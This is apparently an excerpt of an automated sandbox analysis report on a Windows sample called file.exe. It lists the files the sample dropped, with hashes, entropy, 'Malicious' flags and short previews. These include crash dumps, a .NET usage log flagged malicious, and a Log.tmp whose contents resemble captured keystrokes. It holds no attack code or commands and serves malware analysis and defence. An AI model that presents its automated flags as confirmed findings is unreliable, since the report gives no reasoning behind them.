                                                                                        SSDEEP:192:R6l7wVeJyPb6A46YEfnSURgmfZ//MIrpDG89bKbssfEGOEjm:R6lXJCb6H6YEvSURgmfx/NKb/fE26
                                                                                        MD5:80E707A231AF5C8261E896326B456DB5
                                                                                        SHA1:192A5208F193917D0B047090B552B839820DA9C1
                                                                                        SHA-256:8C3F066AD66B6DE4082A5D6C3D0E5D89CC4D7A286EB1114AC7DC53C58E83F087
                                                                                        SHA-512:AEA363B195DEF026835DD3480892E17EA24B1BD28E5C8BAEE8A04C7099BB89848DCD0ECAE31A6DB3EC9BE30AE6F2DC5788B89CB01AAF230443345943C6BB80EB
                                                                                        Malicious:false
                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.6.8.8.<./.P.i.

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER53A0.tmp.xml

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):4780
                                                                                        Entropy (8bit):4.479024748407362
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:cvIwWl8zsZUJg77aI9LAWpW8VYvYm8M4Ju/7PFj+q8vc/77+uvC/KBJg2uNd:uIjfAI7V57VXJwKxuvLg2md
                                                                                        MD5:14A704E7AF641C7D401805CBC122A5C6
                                                                                        SHA1:5267196D22C9598B9B74C9A3126399D2C72EF7DF
                                                                                        SHA-256:3D8511D3489E201ACE99F5E053CEAE3F25FBEA02F902C8AB0E68139CC448C47E
                                                                                        SHA-512:D6A2158226B1126FCB576CFC2FAD29105FC3B1B25DE4262D3431F2897C96D6FFB2274AD0137DD72872D61FA4907B0B16778E8BBB80647F152E2E0E5B97569DF6
                                                                                        Malicious:false
                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="618344" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERB32D.tmp.dmp

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Mini DuMP crash report, 15 streams, Thu Dec 5 18:40:20 2024, 0x1205a4 type
                                                                                        Category:dropped
                                                                                        Size (bytes):220622
                                                                                        Entropy (8bit):3.8824151316534037
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:cGOFn462I74uEq5XLTgscXEcP9ii4+BvWCRz:cGe4YTgDX1t4M
                                                                                        MD5:D9E3F65CFD0C6181318EB6B44FD06CA0
                                                                                        SHA1:25E45A034D7C4B16988C761AA5594F0FE6FA91CE
                                                                                        SHA-256:7DB40E05C3B7A63B8EF453B170C0279BA59063F0AB4AD2E8143E2A7431E040F9
                                                                                        SHA-512:F0FBFBA1670DC91AADF85BA32BBB2D30FDBD0E0B55554270F6BF8487434C060652D7E8C5FF237C595D2E3FBDD9A452E757D972303857E931332EF19F77A03482
                                                                                        Malicious:false
                                                                                        Preview:MDMP..a..... .........Qg........................`...(.......$............%...J..........`.......8...........T...........(..../.......................!..............................................................................eJ......0"......GenuineIntel............T.............Qg............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERB447.tmp.WERInternalMetadata.xml

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):8360
                                                                                        Entropy (8bit):3.689606187196721
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:R6l7wVeJuCJh6BJ6Y9hSU9wZ7WgmfZDF/MIrpDH89bvUsfSFm:R6lXJbh6BJ6YbSU9M7Wgmf//6vHfZ
                                                                                        MD5:67CE5400D7CF79A851C3224E52A7E887
                                                                                        SHA1:A3D3F017981BF134DE286E7E02DCE477DE3FB350
                                                                                        SHA-256:F153C89E6E3173FAA74CC8025D7887F6C341D714C868FC2FD45A52C66EE9AA4D
                                                                                        SHA-512:9A0600442219125A6AC4E7B75450EC132DB08626A5D0E0414FFDE3749E56AD4C7A47DD87A5414799A9CAC41647B20D680C65044942D36E8E23C13AA39A232DE0
                                                                                        Malicious:false
                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.7.8.0.<./.P.i.

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERB4B5.tmp.xml

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):4710
                                                                                        Entropy (8bit):4.441791627178954
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:cvIwWl8zsZpJg77aI9LAWpW8VYNbYm8M4Ja/7PFqW+q8v2/7b26/ErXNd:uIjfdI7V57Vk+JWKSmr9d
                                                                                        MD5:0B911E63E928C7CF99D07807C938FBA4
                                                                                        SHA1:24F00368A3A4CA8FBC5B77257A54314C3B6920F0
                                                                                        SHA-256:D961CC6D5BEA1B5A56827DA83E1811B83106195F2A500724185B1F6636CFE3D8
                                                                                        SHA-512:A65A86660E4CA172EEA5156942E8955A94D56CCC6F48A9E73B18E7A0A6314B61560068A8C178BA842024D210F2461AD63FEB5778684DF783ACA1CBCC56D06F3E
                                                                                        Malicious:false
                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="618343" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERD403.tmp.dmp

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Mini DuMP crash report, 15 streams, Thu Dec 5 18:40:29 2024, 0x1205a4 type
                                                                                        Category:dropped
                                                                                        Size (bytes):216952
                                                                                        Entropy (8bit):3.8832602512021643
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:Pz1L+g1zXL/8AGli0tTQ7D+BpN4uE2aOLNVHylLTgXmuwuBojR/LHJmF81LOCD32:L15rmR8it4uEq7ylLTgXmlLJmK5N3SV
                                                                                        MD5:3BABD344015031AF1BF4CE00E82086F8
                                                                                        SHA1:8744D63EFA2843F55B45AA0240D43EAD7B9F707D
                                                                                        SHA-256:7BB3AFDCC7C6C5B9F6ADCE97F05CCCF0812041F74D177F194AEF52512D5FB976
                                                                                        SHA-512:519FA6C8334D74601587B9025EC8634F8141412D52F5C2FDA0FF484D8C961C66A76E5D9FA7605D61F6714A7DB053EF070056D70210924AC906F5305934A907E5
                                                                                        Malicious:false
                                                                                        Preview:MDMP..a..... .........Qg............................(.......$............$...I..........`.......8...........T............,..."..........@...........,!..............................................................................eJ.......!......GenuineIntel............T.............Qg............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERD58B.tmp.WERInternalMetadata.xml

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):8360
                                                                                        Entropy (8bit):3.6876184223313566
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:R6l7wVeJjCo6E06Y9CSU9IZx6wgmfZDF/MIrpDT89beRsfoqm:R6lXJx616YISU9kowgmf//GeKf0
                                                                                        MD5:119B3C54CCB0057B8A59847118E36E8A
                                                                                        SHA1:D423DD0E5D61653005ED80C7951D60F1D3E5B0BA
                                                                                        SHA-256:95CA73850357B37EA2504BDE86476AF708A55D4AC3599B6D60A547BEDFDBCBF6
                                                                                        SHA-512:D9D1B955E33D4202C7BE0A707E6368991ECCA19903CBAAD52BCE332D167B7CE8D94016E1BF59CEFD27297A09F0427C44B99BF13675C009B54B99DFEA8AB7D4B6
                                                                                        Malicious:false
                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.0.2.0.<./.P.i.

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERD5AB.tmp.xml

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):4710
                                                                                        Entropy (8bit):4.443963422237909
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:cvIwWl8zsZpJg77aI9LAWpW8VYHYm8M4Ja/7PFOo+q8v2/71J26/ErLNd:uIjfdI7V57VHJyKymrZd
                                                                                        MD5:4C71C0D38E55B324E35D3C1F425968AE
                                                                                        SHA1:295130B9FD14E3834B7ECDED61548B839F15DB0C
                                                                                        SHA-256:69E1728530B1AE118D2E0C7BA08CB5E25ED56D7068852AE15C7D099247906BED
                                                                                        SHA-512:008BD79DC0923047597BD6615516AC0C06DDA78BEA5EF89A31DD08BB07FAB88AC4FF06C13FB938F1852159F0A9F4E855C55BB8FFA08ED10565E82B03AFEAFD21
                                                                                        Malicious:false
                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="618343" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERFCA9.tmp.dmp

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Mini DuMP crash report, 15 streams, Thu Dec 5 18:40:39 2024, 0x1205a4 type
                                                                                        Category:dropped
                                                                                        Size (bytes):214612
                                                                                        Entropy (8bit):3.7323996584608645
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:ALqJ7jfATcM4uEq9VLTgCSU4QE3GjqcTV:AeJficM46BTgCSZbO9
                                                                                        MD5:D4812C08F3FBF0E2648B8B70391307C7
                                                                                        SHA1:F5CEB7895C30BCE3C2209220EF2FD54385B30683
                                                                                        SHA-256:366F27EB9E105B0BF39F1A367E7A82E68B6E173A4E5037B0069AA3ECEA44E5FC
                                                                                        SHA-512:C87B173F4A999F36FE6564B07F60D8050582A31251D176B67EBEBF3FCBD7FDEFD4E7D2408546142A833001BE9AC3419FAD275F6667392B8F001B70187851FCE8
                                                                                        Malicious:false
                                                                                        Preview:MDMP..a..... .........Qg........................`...(.......<............ ..jJ..........`.......8...........T...............T........................!..............................................................................eJ......H"......GenuineIntel............T.......H.....Qg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERFDB4.tmp.WERInternalMetadata.xml

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):8398
                                                                                        Entropy (8bit):3.6879435249604096
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:R6l7wVeJpNk67Ao6YEf3SUrgmfZ//MIrpDa89bPBsfKlm:R6lXJpO67Ao6YEPSUrgmfx/BP6fx
                                                                                        MD5:25ABAB02849E9DA99FA8711A91A4C022
                                                                                        SHA1:F8189816FE1BFF8AF954FFD53180A1A78567DCAD
                                                                                        SHA-256:632201C42CE4365A27D399126A6C48B7E0D72F4D6640B6888D4D86752A41EE77
                                                                                        SHA-512:CFC35ED6D08B899728AB32B313EA8923ED3EC84B718EDDDE7900544949232E3E2D68BDBA457094193438A1809A8E0F79E311E1619CEE4EDDEB875B8D890DBE4E
                                                                                        Malicious:false
                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.9.6.0.<./.P.i.

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERFDE4.tmp.xml

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):4780
                                                                                        Entropy (8bit):4.476789336443529
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:cvIwWl8zsZpJg77aI9LAWpW8VY/Ym8M4Ju/7PFeE5+q8vc/7huvC/KBJg2oNd:uIjfdI7V57VnJk5KmuvLg2kd
                                                                                        MD5:FBC8CAB8685A7D80FBA8E622B2F96A9D
                                                                                        SHA1:70E1F5F9EE92C6505D672BF5BF967B8EB5BD3897
                                                                                        SHA-256:06509142679B68E2C1DABF52589098ABC25DCC2657234024FB2590158DF37601
                                                                                        SHA-512:B558F34EC9E19E2A868B30699054784FD1EAFF600468F81B9DA4D814A904206E52E9B0A484642CF508246D59E1B7200CC37141FB3A65A9EC0435C5E72F72F1F4
                                                                                        Malicious:false
                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="618343" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                        File Type:CSV text
                                                                                        Category:dropped
                                                                                        Size (bytes):642
                                                                                        Entropy (8bit):5.345222650979019
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:Q3La/KDLI4MWuPTAWzAbDLI4MNldKZaOKbbDLI4MWuPJKAVKhav:ML9E4KjsXE4qdKtKDE4KhKiKhk
                                                                                        MD5:5A42AAF6EED5DE763D78B81161E562E5
                                                                                        SHA1:0BC3C9744F480E22AD27C7B9BEC85CB63C757CE0
                                                                                        SHA-256:54062224FE33D8E74A490BA90BC259AFB569F4867AC1946C722B22F7550D64BB
                                                                                        SHA-512:877BA9FA0B49D9D71818C6F94C86F215D9322CA4694CA37B2DE0592B89C4A98E44DEEA9DBF78F3AF6512C5403F0B6EF9035ECB9627C091383D3E899ADAB62D4A
                                                                                        Malicious:true
                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\96012833bebd5f21714fc508603cda97\System.Management.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:modified
                                                                                        Size (bytes):2232
                                                                                        Entropy (8bit):5.38001807625381
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:jWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZcvUyus:jLHyIFKL3IZ2KRH9OugQs
                                                                                        MD5:15A37A4026B58AF7B5B3AD00D9059D4E
                                                                                        SHA1:404F66EDC3AC45EF497F5A7B4691AC69CC2305B4
                                                                                        SHA-256:B1D1BA4774A144D850128F604B1926641AC829C9FFB9B7D648C863078BAD62A8
                                                                                        SHA-512:E886E1B9A6F6A2693B8D24390DB9DB569FDD5BF56BE6B63502B04C4F36B5D765CBC77AD30A240E2946B48B0E58D1243CC48D59BEAA808D82532A82E4DA9956B7
                                                                                        Malicious:false
                                                                                        Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                        C:\Users\user\AppData\Local\Temp\Log.tmp

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                        File Type:Generic INItialization configuration [WIN]
                                                                                        Category:modified
                                                                                        Size (bytes):58
                                                                                        Entropy (8bit):3.598349098128234
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:rRSFYJKXzovNsr42VjFYJKXzovX:EFYJKDoWr5FYJKDoP
                                                                                        MD5:5362ACB758D5B0134C33D457FCC002D9
                                                                                        SHA1:BC56DFFBE17C015DB6676CF56996E29DF426AB92
                                                                                        SHA-256:13229E0AD721D53BF9FB50FA66AE92C6C48F2ABB785F9E17A80E224E096028A4
                                                                                        SHA-512:3FB6DA9993FBFC1DC3204DC2529FB7D9C6FE4E6F06E6C8E2DC0BE05CD0E990ED2643359F26EC433087C1A54C8E1C87D02013413CE8F4E1A6D2F380BE0F5EB09B
                                                                                        Malicious:false
                                                                                        Preview:....### explorer ###..[WIN]r[WIN]....### explorer ###..r

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3mdq5sfq.zma.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5zxwyo0l.xfv.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
